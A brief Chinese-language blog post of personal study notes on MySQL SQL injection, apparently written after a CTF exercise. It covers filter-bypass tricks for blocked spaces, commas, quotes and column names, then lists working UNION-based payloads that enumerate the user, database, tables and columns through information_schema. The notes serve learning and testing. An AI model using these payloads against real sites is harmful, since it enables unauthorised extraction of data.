SQLi
Aryb1n
5月 19, 2017
总感觉不会SQLi
昨天做了一道SQLi,感觉自己菜爆了
空格被过滤
使用注释/**/
使用某些%xx,比如%0a, %0d, %0c, %09
使用括号,括号只能加在产生值的项两边
逗号被过滤
limit处 => limit 1 offset 4
union处 => union select * from (select 1)a join (select 2)b
mid处 => mid(user() from 1 for 1)
过滤了要查询的字段名
比如说我要查第四字段secret => select i.4 from (select 1,2,3,4 union select * from news)i
=> 然后由于过滤了逗号所以实际上payload是:
select i.4 from (
select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d
union select * from new s)i
显示多条数据
concat()
group_concat()
concat_ws()
查看字段数
order by n
昨天自己用了很蠢的方法:
select count(*) from information_schema.columns where table_schema=database() and table_name='news'
过滤了单引号
16进制代替字符串
content
查看mysql基本信息
and 1=2 union select 1,2,3,concat_ws(char(32,58,32),0x7c,user(),database(),version()),5,6,7
查询数据库
and 1=2 union select 1,schema_name,3,4 from information_schema.schemata limit 1,1
and 1=2 union select 1,group_concat(schema_name),3,4 from information_schema.schemata
查询表名
and 1=2 union select 1,2,3,4,table_name,5 from information_schema.tables where table_schema=数据库的16进制编码 limit 1,1
and 1=2 union select 1,2,3,4,group_concat(table_name),5 from information_schema.tables where table_schema=数据库的16进制编码
查询字段
and 1=2 union select 1,2,3,4,column_name,5,6,7 from information_schema.columns where table_name=表名的十六进制编码 and table_schema=数据库的16进制编码 limit 1,1
and 1=2 union select 1,2,3,4,group_concat(column_name),5,6,7 from information_schema.columns where table_name=表名的十六进制编码 and table_schema=数据库的16进制编码
参考
https://www.waitalone.cn/mysql-injection-summary.html